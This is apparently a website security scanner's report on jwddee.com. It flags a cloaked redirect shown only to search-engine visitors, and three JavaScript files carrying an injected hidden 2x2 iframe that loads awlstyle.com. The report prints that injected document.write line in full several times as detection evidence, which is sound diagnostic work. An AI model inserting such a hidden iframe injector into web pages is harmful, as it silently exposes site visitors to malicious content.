Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://jwddee.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: jwddee.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 12 Sep 2014 05:12:26 GMT Location: http://awlstyle.com/awwd.html?h=478979 Server: nginx/0.6.39 Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://jwddee.com/ | 200 OK Content-Length: 4185 Content-Type: text/html | clean |
http://jwddee.com/js/jquery.js | 200 OK Content-Length: 78818 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true} b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://awlstyle.com/awwd.html?j=478979 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979> | ||
http://jwddee.com/js/wowslider.js | 200 OK Content-Length: 9513 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979></iframe>');
if(!jQuery.fn.wowSlider){jQuery.fn.wowSlider=function(options){var $this=this;var $=jQuery;options=$.extend({effect:function(options,images){var $=jQuery;images.each(function(Index){if(!Index){$(this).show();}else{$(this).hide();}});this.go=function(new_index,curIdx){$(images.get(new_index)).fadeIn(options.duration);$(imag Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://awlstyle.com/awwd.html?j=478979 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979> | ||
http://jwddee.com/js/script.js | 200 OK Content-Length: 2401 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979></iframe>');
function ws_basic_linear(options,images,container){var $=jQuery;var movingDiv=$("<div></div>").css({position:"absolute",display:"none",'z-index':2,width:options.width*2+"px",height:options.height+"px"}).appendTo(container);images.each(function(Index){$(this).css({'z-index':0});if(!Index){$(this).show();}else{$( Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://awlstyle.com/awwd.html?j=478979 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=478979> | ||
http://jwddee.com/index.php | 200 OK Content-Length: 4185 Content-Type: text/html | clean |
http://jwddee.com/aboutus.php | 200 OK Content-Length: 2970 Content-Type: text/html | clean |
http://jwddee.com/contactus.php | 200 OK Content-Length: 3448 Content-Type: text/html | clean |
http://jwddee.com/products.php | 200 OK Content-Length: 2983 Content-Type: text/html | clean |
http://jwddee.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jwddee.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jwddee.com/
Result: jwddee.com is not infected or malware details are not published yet.
Result: jwddee.com is not infected or malware details are not published yet.